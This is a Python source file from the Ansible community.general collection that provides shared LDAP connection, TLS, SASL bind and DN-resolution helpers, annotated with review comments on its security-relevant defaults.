
Current File : /lib/python3/dist-packages/ansible_collections/community/general/plugins/module_utils/ldap.py
# -*- coding: utf-8 -*-

# Copyright (c) 2016, Peter Sagerson <psagers@ignorare.net>
# Copyright (c) 2016, Jiri Tyr <jiri.tyr@gmail.com>
# Copyright (c) 2017-2018 Keller Fuchs (@KellerFuchs) <kellerfuchs@hashbang.sh>
#
# GNU General Public License v3.0+ (see LICENSES/GPL-3.0-or-later.txt or https://www.gnu.org/licenses/gpl-3.0.txt)
# SPDX-License-Identifier: GPL-3.0-or-later

from __future__ import absolute_import, division, print_function
__metaclass__ = type

import re
import traceback
from ansible.module_utils.common.text.converters import to_native

# python-ldap is treated as optional here: an ImportError is recorded in
# HAS_LDAP rather than propagated, so this file can still be imported without it.
try:
    import ldap
    import ldap.dn
    import ldap.filter
    import ldap.sasl

    HAS_LDAP = True

    # Maps the value of the 'sasl_class' option to the python-ldap SASL helper
    # class used for the bind. Only defined when the imports above succeeded.
    SASCL_CLASS = {
        'gssapi': ldap.sasl.gssapi,
        'external': ldap.sasl.external,
    }
except ImportError:
    # NOTE(review): presumably callers check HAS_LDAP before instantiating
    # LdapGeneric; nothing in this file enforces that.
    HAS_LDAP = False


def gen_specs(**specs):
    """Return *specs* extended with the connection options shared by the LDAP modules.

    The caller's keyword arguments are used as the starting argument spec and
    the common entries below are written on top of them, so a caller-supplied
    entry with the same name (for example ``dn``) is replaced.

    Security-relevant defaults visible here:
      * ``bind_pw`` is flagged ``no_log`` and defaults to the empty string.
      * ``validate_certs`` defaults to True; certificate checking is only
        relaxed when a playbook explicitly turns it off.
      * ``server_uri`` defaults to ``ldapi:///``.
      * ``referrals_chasing`` defaults to ``anonymous``.
    """
    shared_options = (
        ('bind_dn', dict()),
        ('bind_pw', dict(default='', no_log=True)),
        ('ca_path', dict(type='path')),
        ('dn', dict(required=True)),
        ('referrals_chasing', dict(type='str', default='anonymous', choices=['disabled', 'anonymous'])),
        ('server_uri', dict(default='ldapi:///')),
        ('start_tls', dict(default=False, type='bool')),
        ('validate_certs', dict(default=True, type='bool')),
        ('sasl_class', dict(choices=['external', 'gssapi'], default='external', type='str')),
        ('xorder_discovery', dict(choices=['enable', 'auto', 'disable'], default='auto', type='str')),
    )

    # Assign one by one so the shared entries always win over caller input.
    for option_name, option_spec in shared_options:
        specs[option_name] = option_spec

    return specs


class LdapGeneric(object):
    """Common base for LDAP modules: connect, bind, and settle on the target DN.

    Construction has side effects: it opens the LDAP connection and binds
    immediately, then decides whether the configured ``dn`` should be looked
    up in the directory to find its X-ORDERED form.
    """

    def __init__(self, module):
        """Copy the connection parameters from *module*, connect, and resolve ``self.dn``."""
        params = module.params

        # Keep local handles on the module and its connection settings.
        self.module = module
        self.bind_dn = params['bind_dn']
        self.bind_pw = params['bind_pw']
        self.ca_path = params['ca_path']
        self.referrals_chasing = params['referrals_chasing']
        self.server_uri = params['server_uri']
        self.start_tls = params['start_tls']
        self.verify_cert = params['validate_certs']
        self.sasl_class = params['sasl_class']
        self.xorder_discovery = params['xorder_discovery']

        # The connection is opened and bound here, before any DN handling.
        self.connection = self._connect_to_ldap()

        # "enable" always searches; "auto" searches only when the supplied DN
        # does not already carry an {n} ordering prefix; anything else never does.
        mode = self.xorder_discovery
        if mode == "enable":
            discover = True
        elif mode == "auto":
            discover = not self._xorder_dn()
        else:
            discover = False

        self.dn = self._find_dn() if discover else params['dn']

    def fail(self, msg, exn):
        """Report *msg* through the module's ``fail_json`` with the exception text and traceback.

        NOTE(review): the formatted traceback and the native string of the
        LDAP error are both placed in the module result; confirm that this
        output is not exposed more widely than intended.
        """
        details = to_native(exn)
        trace = traceback.format_exc()
        self.module.fail_json(msg=msg, details=details, exception=trace)

    def _find_dn(self):
        """Return the directory's spelling of the configured DN, or the DN as given.

        Searches one level below the parent DN for an entry matching the
        first RDN. The result is used only when exactly one entry matches;
        every other outcome, including any exception, falls back to the
        configured value.
        """
        requested = self.module.params['dn']
        parts = ldap.dn.explode_dn(requested)

        if len(parts) <= 1:
            # No parent to search under.
            return requested

        try:
            # The RDN comes from a module parameter, so it is escaped before
            # being embedded in the search filter.
            rdn_filter = "(%s)" % ldap.filter.escape_filter_chars(parts[0])
            parent_dn = ','.join(parts[1:])
            matches = self.connection.search_s(parent_dn, ldap.SCOPE_ONELEVEL, rdn_filter)
            if len(matches) == 1:
                found_dn, dummy = matches[0]
                return found_dn
        except Exception:
            # Best-effort lookup: errors are swallowed on purpose and the
            # configured DN is returned unchanged.
            pass

        return requested

    def _connect_to_ldap(self):
        """Open a connection to ``server_uri``, apply TLS/referral options, and bind.

        Returns the bound connection object. TLS start-up and bind errors
        are routed to ``self.fail``.
        """
        if not self.verify_cert:
            # Certificate verification is switched off through the
            # module-level ldap.set_option, not on the connection object, so
            # it is not scoped to this connection alone.
            ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)

        if self.ca_path:
            ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, self.ca_path)

        conn = ldap.initialize(self.server_uri)

        if self.referrals_chasing == 'disabled':
            # Switch off chasing of referrals (https://github.com/ansible-collections/community.general/issues/1067)
            conn.set_option(ldap.OPT_REFERRALS, 0)

        if self.start_tls:
            try:
                conn.start_tls_s()
            except ldap.LDAPError as tls_error:
                # NOTE(review): presumably fail_json ends the run here, so the
                # bind below is never attempted without TLS - confirm.
                self.fail("Cannot start TLS.", tls_error)

        try:
            if self.bind_dn is None:
                # No bind DN: SASL bind, falling back to EXTERNAL for an
                # unrecognised sasl_class value.
                mechanism = SASCL_CLASS.get(self.sasl_class, ldap.sasl.external)
                conn.sasl_interactive_bind_s('', mechanism())
            else:
                # NOTE(review): with a plain ldap:// URI and start_tls off,
                # a simple bind sends bind_pw unencrypted; an empty bind_pw
                # (the default) makes this an unauthenticated bind that some
                # servers accept as anonymous.
                conn.simple_bind_s(self.bind_dn, self.bind_pw)
        except ldap.LDAPError as bind_error:
            self.fail("Cannot bind to the server.", bind_error)

        return conn

    def _xorder_dn(self):
        """Return True when the configured DN starts with an ``attr={n}value`` RDN."""
        # match X_ORDERed DNs
        xorder_pattern = r"\w+=\{\d+\}.+"
        matched = re.match(xorder_pattern, self.module.params['dn'])
        return matched is not None
